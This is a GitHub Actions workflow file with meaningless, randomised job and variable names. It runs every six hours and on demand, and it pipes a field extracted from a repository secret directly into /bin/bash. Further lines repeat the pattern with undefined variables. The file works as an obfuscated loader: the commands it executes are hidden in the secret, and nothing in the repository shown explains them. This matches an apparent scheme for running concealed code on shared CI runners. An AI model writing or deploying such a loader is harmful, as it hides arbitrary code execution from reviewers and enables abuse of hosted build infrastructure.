name: chengyihai2603
on:
  workflow_dispatch:
  schedule:
    - cron: '4 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengyihai2603
        env:
          bajm87200: ${{ secrets.bajm87200 }}
        run: |
          echo $bajm87200 | jq -r .oiah12 | /bin/bash
          echo $hw54 | jq -r .hsxya80485 | /bin/bash
          echo $vf54674 | jq -r .z54334 | /bin/bash
          echo $xn8 | jq -r .prju1 | /bin/bash
          echo $uul24 | jq -r .ogzec7 | /bin/bash
          echo $r27 | jq -r .h7650 | /bin/bash

